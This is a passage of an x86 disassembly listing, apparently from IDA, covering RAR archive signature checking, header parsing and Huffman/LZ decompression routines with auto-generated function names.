mov [ebp+70h+var_7D], 0Ah
mov [ebp+70h+var_7C], 0Bh
mov [ebp+70h+var_7B], 0Bh
mov [ebp+70h+var_7A], 0Ch
mov [ebp+70h+var_79], 0Ch
mov [ebp+70h+var_78], 0Dh
mov [ebp+70h+var_77], 0Dh
mov [ebp+70h+var_76], 0Eh
mov [ebp+70h+var_75], 0Eh
mov [ebp+70h+var_74], 0Fh
mov [ebp+70h+var_73], 0Fh
mov [ebp+70h+var_72], 10h
mov [ebp+70h+var_71], 10h
mov [ebp+70h+var_70], 10h
mov [ebp+70h+var_6F], 10h
mov [ebp+70h+var_6E], 10h
mov [ebp+70h+var_6D], 10h
push edi
push [ebp+70h+arg_4]
mov [ebp+70h+var_6C], 10h
mov [ebp+70h+var_6B], 10h
mov [ebp+70h+var_6A], 10h
mov [ebp+70h+var_69], 10h
mov [ebp+70h+var_68], 10h
mov [ebp+70h+var_67], 10h
mov [ebp+70h+var_66], 10h
mov [ebp+70h+var_65], 10h
mov [ebp+70h+var_64], 12h
mov [ebp+70h+var_63], 12h
mov [ebp+70h+var_62], 12h
mov [ebp+70h+var_61], 12h
mov [ebp+70h+var_60], 12h
mov [ebp+70h+var_5F], 12h
mov [ebp+70h+var_5E], 12h
mov [ebp+70h+var_5D], 12h
mov [ebp+70h+var_5C], 12h
mov [ebp+70h+var_5B], 12h
mov [ebp+70h+var_5A], 12h
mov [ebp+70h+var_59], 12h
mov [ebp+70h+var_18], bl
mov [ebp+70h+var_17], 4
mov [ebp+70h+var_16], 8
mov [ebp+70h+var_15], 10h
mov [ebp+70h+var_14], 20h
mov [ebp+70h+var_13], 40h
mov [ebp+70h+var_12], 80h
mov [ebp+70h+var_11], 0C0h
mov [ebp+70h+var_20], 2
mov [ebp+70h+var_1F], 2
mov [ebp+70h+var_1E], 3
mov [ebp+70h+var_1D], 4
mov [ebp+70h+var_1C], 5
mov [ebp+70h+var_1B], 6
mov [ebp+70h+var_1A], 6
mov [ebp+70h+var_19], 6
mov [ebp+70h+var_C], eax
call sub_9B143F
push edi
push [ebp+70h+arg_0]
call sub_9B04E9
add esp, 10h
test eax, eax
jz short loc_9B19A1
cmp [ebp+70h+arg_4], ebx
jz short loc_9B1992
cmp [edi+408014h], ebx
jnz short loc_9B19A8
loc_9B1992: ; CODE XREF: sub_9B1547+441�j
push [ebp+70h+arg_0]
mov eax, edi
call sub_9B0AAE
test eax, eax
pop ecx
jnz short loc_9B19A8
loc_9B19A1: ; CODE XREF: sub_9B1547+43C�j
xor eax, eax
jmp loc_9B1C83
; ---------------------------------------------------------------------------
loc_9B19A8: ; CODE XREF: sub_9B1547+449�j
; sub_9B1547+458�j
push esi
loc_9B19A9: ; CODE XREF: sub_9B1547+5A1�j
; sub_9B1547+5DE�j ...
mov eax, [edi+408004h]
mov esi, 3FFFFFh
and [edi+40800Ch], esi
cmp eax, [edi+40801Ch]
jle short loc_9B19D5
push edi
push [ebp+70h+arg_0]
call sub_9B04E9
test eax, eax
pop ecx
pop ecx
jz loc_9B1DCB
loc_9B19D5: ; CODE XREF: sub_9B1547+479�j
mov eax, [edi+408010h]
mov ecx, [edi+40800Ch]
mov edx, eax
sub edx, ecx
and edx, esi
cmp edx, 104h
jnb short loc_9B19FA
cmp eax, ecx
jz short loc_9B19FA
mov eax, edi
call sub_9B06DE
loc_9B19FA: ; CODE XREF: sub_9B1547+4A6�j
; sub_9B1547+4AA�j
cmp dword ptr [edi+408020h], 1
jnz loc_9B1B2A
push edi
push [ebp+70h+arg_0]
lea esi, [edi+408B10h]
push esi
call sub_9B37F8
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+70h+var_10], eax
jz loc_9B1DB8
cmp eax, [edi+40D79Ch]
jnz loc_9B1B12
push edi
push [ebp+70h+arg_0]
push esi
call sub_9B37F8
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_9B1DCB
cmp eax, ebx
jnz short loc_9B1A5B
push [ebp+70h+arg_0]
mov eax, edi
call sub_9B0AAE
jmp loc_9B1C99
; ---------------------------------------------------------------------------
loc_9B1A5B: ; CODE XREF: sub_9B1547+503�j
cmp eax, 2
jz loc_9B1C78
cmp eax, 3
jnz short loc_9B1A76
push [ebp+70h+arg_0]
call sub_9B1364
jmp loc_9B1C99
; ---------------------------------------------------------------------------
loc_9B1A76: ; CODE XREF: sub_9B1547+520�j
cmp eax, 4
jnz short loc_9B1AED
mov [ebp+70h+var_8], ebx
mov [ebp+70h+var_10], ebx
mov [ebp+70h+var_4], ebx
loc_9B1A84: ; CODE XREF: sub_9B1547+581�j
cmp [ebp+70h+var_10], ebx
jnz loc_9B1DCB
push edi
push [ebp+70h+arg_0]
push esi
call sub_9B37F8
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_9B1AA8
mov [ebp+70h+var_10], 1
jmp short loc_9B1AC1
; ---------------------------------------------------------------------------
loc_9B1AA8: ; CODE XREF: sub_9B1547+556�j
cmp [ebp+70h+var_4], 3
movzx eax, al
jnz short loc_9B1AB6
mov [ebp+70h+var_98], eax
jmp short loc_9B1AC1
; ---------------------------------------------------------------------------
loc_9B1AB6: ; CODE XREF: sub_9B1547+568�j
mov ecx, [ebp+70h+var_8]
shl ecx, 8
add ecx, eax
mov [ebp+70h+var_8], ecx
loc_9B1AC1: ; CODE XREF: sub_9B1547+55F�j
; sub_9B1547+56D�j
inc [ebp+70h+var_4]
cmp [ebp+70h+var_4], 4
jl short loc_9B1A84
cmp [ebp+70h+var_10], ebx
jnz loc_9B1DCB
mov eax, [ebp+70h+var_8]
mov ecx, [ebp+70h+var_98]
add eax, 2
add ecx, 20h
loc_9B1ADF: ; CODE XREF: sub_9B1547+806�j
push eax
loc_9B1AE0: ; CODE XREF: sub_9B1547+5C6�j
; sub_9B1547+77B�j
mov eax, edi
call sub_9B03FD
loc_9B1AE7: ; CODE XREF: sub_9B1547+86C�j
pop ecx
jmp loc_9B19A9
; ---------------------------------------------------------------------------
loc_9B1AED: ; CODE XREF: sub_9B1547+532�j
cmp eax, 5
jnz short loc_9B1B0F
push edi
push [ebp+70h+arg_0]
push esi
call sub_9B37F8
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_9B1DCB
push 1
lea ecx, [eax+4]
jmp short loc_9B1AE0
; ---------------------------------------------------------------------------
loc_9B1B0F: ; CODE XREF: sub_9B1547+5A9�j
mov eax, [ebp+70h+var_10]
loc_9B1B12: ; CODE XREF: sub_9B1547+4E5�j
; sub_9B1547+5F9�j
mov ecx, [edi+40800Ch]
mov [ecx+edi+8004h], al
inc dword ptr [edi+40800Ch]
jmp loc_9B19A9
; ---------------------------------------------------------------------------
loc_9B1B2A: ; CODE XREF: sub_9B1547+4BA�j
lea eax, [edi+4081C0h]
push eax
push edi
call sub_9B09FF
mov edx, 100h
cmp eax, edx
pop ecx
pop ecx
jl short loc_9B1B12
mov ecx, 10Fh
cmp eax, ecx
jl loc_9B1C61
sub eax, ecx
movzx esi, [ebp+eax+70h+var_3C]
movzx eax, [ebp+eax+70h+var_58]
add esi, 3
cmp eax, ebx
mov [ebp+70h+var_8], esi
mov [ebp+70h+var_4], eax
jbe short loc_9B1B87
push edi
call sub_9B04B6
push 10h
pop ecx
sub ecx, [ebp+70h+var_4]
push [ebp+70h+var_4]
shr eax, cl
push edi
add esi, eax
mov [ebp+70h+var_8], esi
call sub_9B0493
add esp, 0Ch
loc_9B1B87: ; CODE XREF: sub_9B1547+61F�j
lea eax, [edi+4086F0h]
push eax
push edi
call sub_9B09FF
mov esi, [ebp+eax*4+70h+var_188]
pop ecx
pop ecx
movzx ecx, [ebp+eax+70h+var_94]
inc esi
cmp ecx, ebx
mov [ebp+70h+var_4], ecx
jbe loc_9B1C3B
cmp eax, 9
jle short loc_9B1C1F
cmp ecx, 4
jbe short loc_9B1BDC
push edi
call sub_9B04B6
mov edx, eax
mov eax, [ebp+70h+var_4]
push 14h
pop ecx
sub ecx, eax
shr edx, cl
add eax, 0FFFFFFFCh
push eax
push edi
shl edx, 4
add esi, edx
call sub_9B0493
add esp, 0Ch
loc_9B1BDC: ; CODE XREF: sub_9B1547+66F�j
mov eax, [edi+408028h]
cmp eax, ebx
jle short loc_9B1BEF
dec eax
mov [edi+408028h], eax
jmp short loc_9B1C0D
; ---------------------------------------------------------------------------
loc_9B1BEF: ; CODE XREF: sub_9B1547+69D�j
lea eax, [edi+408864h]
push eax
push edi
call sub_9B09FF
cmp eax, 10h
pop ecx
pop ecx
jnz short loc_9B1C15
mov dword ptr [edi+408028h], 0Fh
loc_9B1C0D: ; CODE XREF: sub_9B1547+6A6�j
add esi, [edi+408024h]
jmp short loc_9B1C3B
; ---------------------------------------------------------------------------
loc_9B1C15: ; CODE XREF: sub_9B1547+6BA�j
add esi, eax
mov [edi+408024h], eax
jmp short loc_9B1C3B
; ---------------------------------------------------------------------------
loc_9B1C1F: ; CODE XREF: sub_9B1547+66A�j
push edi
call sub_9B04B6
push 10h
pop ecx
sub ecx, [ebp+70h+var_4]
push [ebp+70h+var_4]
shr eax, cl
push edi
add esi, eax
call sub_9B0493
add esp, 0Ch
loc_9B1C3B: ; CODE XREF: sub_9B1547+661�j
; sub_9B1547+6CC�j ...
cmp esi, 2000h
jb short loc_9B1C51
inc [ebp+70h+var_8]
cmp esi, 40000h
jb short loc_9B1C51
inc [ebp+70h+var_8]
loc_9B1C51: ; CODE XREF: sub_9B1547+6FA�j
; sub_9B1547+705�j
push esi
mov eax, edi
call sub_9B03D3
mov ecx, [ebp+70h+var_8]
jmp loc_9B1D9E
; ---------------------------------------------------------------------------
loc_9B1C61: ; CODE XREF: sub_9B1547+602�j
cmp eax, edx
jnz short loc_9B1C8A
push [ebp+70h+arg_0]
mov esi, edi
call sub_9B0D64
test eax, eax
pop ecx
jnz loc_9B19A9
loc_9B1C78: ; CODE XREF: sub_9B1547+517�j
mov eax, edi
call sub_9B06DE
loc_9B1C7F: ; CODE XREF: sub_9B1547+887�j
mov eax, [ebp+70h+var_C]
pop esi
loc_9B1C83: ; CODE XREF: sub_9B1547+45C�j
pop edi
pop ebx
add ebp, 70h
leave
retn
; ---------------------------------------------------------------------------
loc_9B1C8A: ; CODE XREF: sub_9B1547+71C�j
cmp eax, 101h
jnz short loc_9B1CA7
push [ebp+70h+arg_0]
call sub_9B128A
loc_9B1C99: ; CODE XREF: sub_9B1547+50F�j
; sub_9B1547+52A�j
test eax, eax
pop ecx
jnz loc_9B19A9
jmp loc_9B1DCB
; ---------------------------------------------------------------------------
loc_9B1CA7: ; CODE XREF: sub_9B1547+748�j
cmp eax, 102h
jnz short loc_9B1CC7
mov ecx, [edi+408B0Ch]
cmp ecx, ebx
jz loc_9B19A9
push dword ptr [edi+408B08h]
jmp loc_9B1AE0
; ---------------------------------------------------------------------------
loc_9B1CC7: ; CODE XREF: sub_9B1547+765�j
cmp eax, 107h
jge loc_9B1D52
add eax, 0FFFFFEFDh
cmp eax, ebx
lea ecx, [edi+eax*4+408AF4h]
mov edx, [ecx]
mov [ebp+70h+var_8], edx
jle short loc_9B1CF8
mov [ebp+70h+var_10], eax
loc_9B1CEA: ; CODE XREF: sub_9B1547+7AF�j
dec [ebp+70h+var_10]
lea esi, [ecx-4]
mov eax, [esi]
mov [ecx], eax
mov ecx, esi
jnz short loc_9B1CEA
loc_9B1CF8: ; CODE XREF: sub_9B1547+79E�j
lea eax, [edi+40892Ch]
push eax
push edi
mov [edi+408AF4h], edx
call sub_9B09FF
movzx esi, [ebp+eax+70h+var_3C]
movzx eax, [ebp+eax+70h+var_58]
inc esi
pop ecx
inc esi
cmp eax, ebx
pop ecx
mov [ebp+70h+var_4], eax
jbe short loc_9B1D3C
push edi
call sub_9B04B6
push 10h
pop ecx
sub ecx, [ebp+70h+var_4]
push [ebp+70h+var_4]
shr eax, cl
push edi
add esi, eax
call sub_9B0493
add esp, 0Ch
loc_9B1D3C: ; CODE XREF: sub_9B1547+7D7�j
mov eax, [ebp+70h+var_8]
mov [edi+408B08h], eax
mov [edi+408B0Ch], esi
mov ecx, esi
jmp loc_9B1ADF
; ---------------------------------------------------------------------------
loc_9B1D52: ; CODE XREF: sub_9B1547+785�j
cmp eax, 110h
jge loc_9B19A9
movzx esi, byte ptr [ebp+eax+70h+var_120+1]
sub eax, 107h
movzx eax, [ebp+eax+70h+var_20]
inc esi
cmp eax, ebx
mov [ebp+70h+var_4], eax
jbe short loc_9B1D93
push edi
call sub_9B04B6
push 10h
pop ecx
sub ecx, [ebp+70h+var_4]
push [ebp+70h+var_4]
shr eax, cl
push edi
add esi, eax
call sub_9B0493
add esp, 0Ch
loc_9B1D93: ; CODE XREF: sub_9B1547+82E�j
push esi
mov eax, edi
call sub_9B03D3
push 2
pop ecx
loc_9B1D9E: ; CODE XREF: sub_9B1547+715�j
push esi
mov eax, edi
mov [edi+408B08h], esi
mov [edi+408B0Ch], ecx
call sub_9B03FD
pop ecx
jmp loc_9B1AE7
; ---------------------------------------------------------------------------
loc_9B1DB8: ; CODE XREF: sub_9B1547+4D9�j
lea eax, [edi+408B10h]
push eax
call sub_9B36DE
pop ecx
mov [edi+408020h], ebx
loc_9B1DCB: ; CODE XREF: sub_9B1547+488�j
; sub_9B1547+4FB�j ...
mov [ebp+70h+var_C], ebx
jmp loc_9B1C7F
sub_9B1547 endp
; =============== S U B R O U T I N E =======================================
sub_9B1DD3 proc near ; CODE XREF: sub_9B221A+13D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
xor eax, eax
cmp [esp+arg_4], 1Dh
jnz short locret_9B1DEF
push [esp+arg_8]
mov eax, [esp+4+arg_C]
push [esp+4+arg_0]
call sub_9B1547
pop ecx
pop ecx
locret_9B1DEF: ; CODE XREF: sub_9B1DD3+7�j
retn
sub_9B1DD3 endp
; =============== S U B R O U T I N E =======================================
sub_9B1DF0 proc near ; CODE XREF: sub_9B1E8C+1D�p
; sub_9B1E8C+85�p ...
var_2 = byte ptr -2
push ecx
sub eax, 73h
push esi
jz short loc_9B1E47
dec eax
jz short loc_9B1DFE
loc_9B1DFA: ; CODE XREF: sub_9B1DF0+1B�j
; sub_9B1DF0+64�j ...
xor eax, eax
jmp short loc_9B1E3A
; ---------------------------------------------------------------------------
loc_9B1DFE: ; CODE XREF: sub_9B1DF0+8�j
push 34h ; Size
call malloc
mov esi, eax
test esi, esi
pop ecx
jz short loc_9B1DFA
push 20h ; Size
push esi ; Dst
push edi ; int
call sub_9B4FA3
add esp, 0Ch
cmp eax, 20h
jnz short loc_9B1E67
test byte ptr [esi+4], 1
jz short loc_9B1E3D
push 8 ; Size
lea eax, [esi+20h]
push eax ; Dst
push edi ; int
call sub_9B4FA3
add esp, 0Ch
cmp eax, 8
loc_9B1E36: ; CODE XREF: sub_9B1DF0+9A�j
jnz short loc_9B1E67
loc_9B1E38: ; CODE XREF: sub_9B1DF0+55�j
; sub_9B1DF0+85�j
mov eax, esi
loc_9B1E3A: ; CODE XREF: sub_9B1DF0+C�j
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_9B1E3D: ; CODE XREF: sub_9B1DF0+32�j
and dword ptr [esi+20h], 0
and dword ptr [esi+24h], 0
jmp short loc_9B1E38
; ---------------------------------------------------------------------------
loc_9B1E47: ; CODE XREF: sub_9B1DF0+5�j
push 0Dh ; Size
call malloc
mov esi, eax
test esi, esi
pop ecx
jz short loc_9B1DFA
push 0Dh ; Size
push esi ; Dst
push edi ; int
call sub_9B4FA3
add esp, 0Ch
cmp eax, 0Dh
jz short loc_9B1E71
loc_9B1E67: ; CODE XREF: sub_9B1DF0+2C�j
; sub_9B1DF0:loc_9B1E36�j
push esi ; Memory
call free
pop ecx
jmp short loc_9B1DFA
; ---------------------------------------------------------------------------
loc_9B1E71: ; CODE XREF: sub_9B1DF0+75�j
test byte ptr [esi+4], 2
jz short loc_9B1E38
push 1 ; Size
lea eax, [esp+0Bh]
push eax ; Dst
push edi ; int
call sub_9B4FA3
add esp, 0Ch
cmp eax, 1
jmp short loc_9B1E36
sub_9B1DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1E8C proc near ; CODE XREF: sub_9B215A+B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push 1
push 0
push edi
call sub_9B505B
add esp, 0Ch
mov [ebp+var_4], eax
push 74h
pop eax
call sub_9B1DF0
mov esi, eax
test esi, esi
jz short loc_9B1F1C
mov ebx, free
loc_9B1EBA: ; CODE XREF: sub_9B1E8C+8E�j
movzx eax, word ptr [esi+5]
mov ecx, [ebp+var_4]
add eax, ecx
test byte ptr [esi+4], 80h
mov [esi+2Ch], ecx
mov [esi+30h], eax
jz short loc_9B1ED7
mov edx, [esi+7]
add edx, eax
mov [esi+30h], edx
loc_9B1ED7: ; CODE XREF: sub_9B1E8C+41�j
mov eax, [esi+30h]
cmp eax, ecx
jle short loc_9B1F23
movzx ecx, byte ptr [esi+2]
cmp ecx, [ebp+arg_4]
jz short loc_9B1F28
mov edi, [ebp+arg_0]
push 0
push eax
push edi
call sub_9B505B
add esp, 0Ch
cmp eax, [esi+30h]
jnz short loc_9B1F1C
push esi ; Memory
call ebx ; free
push 1
push 0
push edi
call sub_9B505B
add esp, 10h
mov [ebp+var_4], eax
push 74h
pop eax
call sub_9B1DF0
mov esi, eax
test esi, esi
jnz short loc_9B1EBA
loc_9B1F1C: ; CODE XREF: sub_9B1E8C+26�j
; sub_9B1E8C+6D�j ...
xor eax, eax
loc_9B1F1E: ; CODE XREF: sub_9B1E8C+DE�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B1F23: ; CODE XREF: sub_9B1E8C+50�j
; sub_9B1E8C+AE�j
push esi ; Memory
call ebx ; free
jmp short loc_9B1F5E
; ---------------------------------------------------------------------------
loc_9B1F28: ; CODE XREF: sub_9B1E8C+59�j
movzx eax, word ptr [esi+1Ah]
inc eax
push eax ; Size
call malloc
test eax, eax
pop ecx
mov [esi+28h], eax
jz short loc_9B1F23
movzx ecx, word ptr [esi+1Ah]
movzx edi, word ptr [esi+1Ah]
push ecx ; Size
push eax ; Dst
push [ebp+arg_0] ; int
call sub_9B4FA3
add esp, 0Ch
cmp eax, edi
jz short loc_9B1F61
push dword ptr [esi+28h] ; Memory
call ebx ; free
push esi ; Memory
call ebx ; free
pop ecx
loc_9B1F5E: ; CODE XREF: sub_9B1E8C+9A�j
pop ecx
jmp short loc_9B1F1C
; ---------------------------------------------------------------------------
loc_9B1F61: ; CODE XREF: sub_9B1E8C+C7�j
mov eax, [esi+28h]
mov byte ptr [edi+eax], 0
mov eax, esi
jmp short loc_9B1F1E
sub_9B1E8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1F6C proc near ; CODE XREF: sub_9B202D+18�p
Buf1 = byte ptr -10h
Buf2 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push 7 ; Size
lea eax, [ebp+Buf1]
push eax ; Dst
push [ebp+arg_0] ; int
mov [ebp+Buf2], 52h
mov [ebp+var_7], 61h
mov [ebp+var_6], 72h
mov [ebp+var_5], 21h
mov [ebp+var_4], 1Ah
mov [ebp+var_3], 7
mov [ebp+var_2], 0
call sub_9B4FA3
add esp, 0Ch
cmp eax, 7
jz short loc_9B1FA8
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_9B1FA8: ; CODE XREF: sub_9B1F6C+36�j
push 7 ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
lea eax, [ebp+Buf1]
push eax ; Buf1
call memcmp
add esp, 0Ch
neg eax
sbb eax, eax
inc eax
leave
retn
sub_9B1F6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1FC1 proc near ; CODE XREF: sub_9B221A+CB�p
Dst = byte ptr -2000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 2000h
call __alloca_probe
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
push esi
push edi
jbe short loc_9B2017
loc_9B1FD8: ; CODE XREF: sub_9B1FC1+54�j
mov edi, 2000h
cmp ebx, edi
ja short loc_9B1FE3
mov edi, ebx
loc_9B1FE3: ; CODE XREF: sub_9B1FC1+1E�j
push edi ; Size
lea eax, [ebp+Dst]
push eax ; Dst
push [ebp+arg_0] ; int
call sub_9B4FA3
mov esi, eax
add esp, 0Ch
cmp esi, edi
jnz short loc_9B201F
push esi ; Size
lea eax, [ebp+Dst]
push eax ; Src
push [ebp+arg_4] ; int
call sub_9B4FFF
add esp, 0Ch
cmp eax, esi
jnz short loc_9B2024
sub ebx, esi
jnz short loc_9B1FD8
loc_9B2017: ; CODE XREF: sub_9B1FC1+15�j
mov eax, [ebp+arg_8]
loc_9B201A: ; CODE XREF: sub_9B1FC1+6A�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B201F: ; CODE XREF: sub_9B1FC1+39�j
mov eax, [ebp+arg_8]
jmp short loc_9B2029
; ---------------------------------------------------------------------------
loc_9B2024: ; CODE XREF: sub_9B1FC1+50�j
mov eax, [ebp+arg_8]
sub eax, esi
loc_9B2029: ; CODE XREF: sub_9B1FC1+61�j
sub eax, ebx
jmp short loc_9B201A
sub_9B1FC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B202D(int,void *Memory)
sub_9B202D proc near ; CODE XREF: sub_9B02F5+53�p
arg_0 = dword ptr 8
Memory = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+Memory]
test ebx, ebx
jnz short loc_9B2040
push 0FFFFFFFEh
pop eax
jmp loc_9B2157
; ---------------------------------------------------------------------------
loc_9B2040: ; CODE XREF: sub_9B202D+9�j
push edi
mov edi, [ebp+arg_0]
push edi
call sub_9B1F6C
test eax, eax
pop ecx
jnz short loc_9B2057
loc_9B204F: ; CODE XREF: sub_9B202D+37�j
push 0FFFFFFFEh
pop eax
jmp loc_9B2156
; ---------------------------------------------------------------------------
loc_9B2057: ; CODE XREF: sub_9B202D+20�j
push 73h
pop eax
call sub_9B1DF0
test eax, eax
mov [ebp+Memory], eax
jz short loc_9B204F
test byte ptr [eax+3], 80h
push esi
jz short loc_9B2072
push 2
loc_9B206F: ; CODE XREF: sub_9B202D+4E�j
pop esi
jmp short loc_9B2097
; ---------------------------------------------------------------------------
loc_9B2072: ; CODE XREF: sub_9B202D+3E�j
cmp word ptr [eax+5], 0Dh
jnb short loc_9B207D
push 0FFFFFFFEh
jmp short loc_9B206F
; ---------------------------------------------------------------------------
loc_9B207D: ; CODE XREF: sub_9B202D+4A�j
push 411BD8h ; Size
call malloc
mov esi, eax
xor edi, edi
cmp esi, edi
pop ecx
jnz short loc_9B20A6
mov eax, [ebp+Memory]
or esi, 0FFFFFFFFh
loc_9B2097: ; CODE XREF: sub_9B202D+43�j
push eax ; Memory
call free
pop ecx
mov eax, esi
jmp loc_9B2155
; ---------------------------------------------------------------------------
loc_9B20A6: ; CODE XREF: sub_9B202D+62�j
or dword ptr [esi+40D7F4h], 0FFFFFFFFh
lea eax, [esi+408B10h]
push eax
mov [esi+40D7CCh], edi
mov [esi+40D7B0h], edi
mov [esi+40D7A0h], edi
mov [esi+40D7A8h], edi
mov [esi+40D7A4h], edi
mov [esi+40D7ACh], edi
call sub_9B36BD
mov eax, [ebp+Memory]
mov ax, [eax+5]
cmp ax, 0Dh
pop ecx
jbe short loc_9B2137
movzx eax, ax
push 1
sub eax, 0Dh
push eax
push [ebp+arg_0]
call sub_9B505B
add esp, 0Ch
test eax, eax
jnz short loc_9B2137
push [ebp+Memory] ; Memory
mov edi, free
call edi ; free
lea eax, [esi+408B10h]
push eax
call sub_9B36D0
push esi
call sub_9B0DBC
lea eax, [esi+40D7CCh]
push eax
call sub_9B3A3D
push esi ; Memory
call edi ; free
add esp, 14h
push 0FFFFFFFEh
pop eax
jmp short loc_9B2155
; ---------------------------------------------------------------------------
loc_9B2137: ; CODE XREF: sub_9B202D+BC�j
; sub_9B202D+D4�j
mov eax, [ebp+Memory]
mov [ebx+10h], eax
mov eax, [ebp+arg_0]
mov [ebx+1Ch], eax
mov [ebx+0Ch], esi
mov [ebx+4], edi
mov [ebx+8], edi
mov dword ptr [ebx+18h], 1
xor eax, eax
loc_9B2155: ; CODE XREF: sub_9B202D+74�j
; sub_9B202D+108�j
pop esi
loc_9B2156: ; CODE XREF: sub_9B202D+25�j
pop edi
loc_9B2157: ; CODE XREF: sub_9B202D+E�j
pop ebx
pop ebp
retn
sub_9B202D endp
; =============== S U B R O U T I N E =======================================
sub_9B215A proc near ; CODE XREF: sub_9B02F5+6C�p
arg_0 = dword ptr 4
push ebp
push edi
mov edi, [esp+8+arg_0]
push 74h
push dword ptr [edi+1Ch]
call sub_9B1E8C
xor ebp, ebp
cmp eax, ebp
pop ecx
pop ecx
mov [edi], eax
jnz short loc_9B217C
xor eax, eax
inc eax
jmp loc_9B2217
; ---------------------------------------------------------------------------
loc_9B217C: ; CODE XREF: sub_9B215A+18�j
push esi
push 21h ; Size
call malloc
mov esi, eax
cmp esi, ebp
pop ecx
jnz short loc_9B2194
loc_9B218C: ; CODE XREF: sub_9B215A+A0�j
or eax, 0FFFFFFFFh
jmp loc_9B2216
; ---------------------------------------------------------------------------
loc_9B2194: ; CODE XREF: sub_9B215A+30�j
push ebx
mov ebx, [edi]
push 1
push ebp
push ebp
push dword ptr [ebx+20h]
call __allmul
mov ecx, [ebx+7]
xor ebx, ebx
add eax, ecx
push 1
adc edx, ebx
push ebp
mov [esi], eax
mov [esi+4], edx
mov ebx, [edi]
push ebp
push dword ptr [ebx+24h]
call __allmul
mov ecx, [ebx+0Bh]
xor ebx, ebx
add eax, ecx
mov [esi+8], eax
adc edx, ebx
mov [esi+0Ch], edx
mov eax, [edi]
mov eax, [eax+10h]
mov [esi+18h], eax
mov eax, [edi]
mov al, [eax+19h]
mov [esi+20h], al
mov eax, [edi]
push dword ptr [eax+28h] ; Src
call _strdup
cmp eax, ebp
pop ecx
mov [esi+10h], eax
pop ebx
jnz short loc_9B21FC
push esi ; Memory
call free
pop ecx
jmp short loc_9B218C
; ---------------------------------------------------------------------------
loc_9B21FC: ; CODE XREF: sub_9B215A+96�j
mov [esi+14h], ebp
mov [esi+1Ch], ebp
mov eax, [edi+8]
cmp eax, ebp
jnz short loc_9B220E
mov [edi+4], esi
jmp short loc_9B2211
; ---------------------------------------------------------------------------
loc_9B220E: ; CODE XREF: sub_9B215A+AD�j
mov [eax+14h], esi
loc_9B2211: ; CODE XREF: sub_9B215A+B2�j
mov [edi+8], esi
xor eax, eax
loc_9B2216: ; CODE XREF: sub_9B215A+35�j
pop esi
loc_9B2217: ; CODE XREF: sub_9B215A+1D�j
pop edi
pop ebp
retn
sub_9B215A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B221A proc near ; CODE XREF: sub_9B02F5+81�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
mov eax, [esi]
push edi
mov edi, eax
mov [ebp+arg_0], eax
movzx eax, word ptr [edi+5]
add eax, [edi+2Ch]
push 0
push eax
push dword ptr [esi+1Ch]
call sub_9B505B
movzx ecx, word ptr [edi+5]
add ecx, [edi+2Ch]
add esp, 0Ch
cmp eax, ecx
jz short loc_9B2254
push dword ptr [edi+28h]
loc_9B224C: ; CODE XREF: sub_9B221A+15C�j
mov edi, free
jmp short loc_9B228C
; ---------------------------------------------------------------------------
loc_9B2254: ; CODE XREF: sub_9B221A+2D�j
mov ax, [edi+3]
test al, 4
jz short loc_9B229C
mov eax, [esi+8]
mov dword ptr [eax+1Ch], 1
loc_9B2266: ; CODE XREF: sub_9B221A+84�j
; sub_9B221A+93�j ...
mov edi, [esi]
push 0
mov eax, edi
push dword ptr [eax+30h]
push dword ptr [esi+1Ch]
call sub_9B505B
add esp, 0Ch
push dword ptr [edi+28h] ; Memory
cmp eax, [edi+30h]
mov edi, free
jz loc_9B237B
loc_9B228C: ; CODE XREF: sub_9B221A+38�j
call edi ; free
push dword ptr [esi] ; Memory
call edi ; free
pop ecx
pop ecx
push 0FFFFFFFEh
pop eax
jmp loc_9B239B
; ---------------------------------------------------------------------------
loc_9B229C: ; CODE XREF: sub_9B221A+40�j
test al, 3
jnz short loc_9B2266
mov eax, [esi+10h]
mov ax, [eax+3]
test al, 1
jz short loc_9B22AF
test al, 8
jnz short loc_9B2266
loc_9B22AF: ; CODE XREF: sub_9B221A+8F�j
push dword ptr [edi+0Bh] ; Size
lea eax, [esi+24h]
push 8302h ; char
push eax ; int
call sub_9B50DB
add esp, 0Ch
test eax, eax
jge short loc_9B22CE
mov eax, [esi]
jmp loc_9B2373
; ---------------------------------------------------------------------------
loc_9B22CE: ; CODE XREF: sub_9B221A+AB�j
mov ecx, [esi+0Ch]
mov [ecx], eax
mov edx, [esi]
mov [esi+20h], eax
cmp byte ptr [edx+19h], 30h
jnz short loc_9B22F2
push dword ptr [edx+7]
push eax
push dword ptr [esi+1Ch]
call sub_9B1FC1
add esp, 0Ch
jmp loc_9B2266
; ---------------------------------------------------------------------------
loc_9B22F2: ; CODE XREF: sub_9B221A+C2�j
mov eax, [edx+0Bh]
and dword ptr [ecx+40D7C8h], 0
mov [ecx+40D7C4h], eax
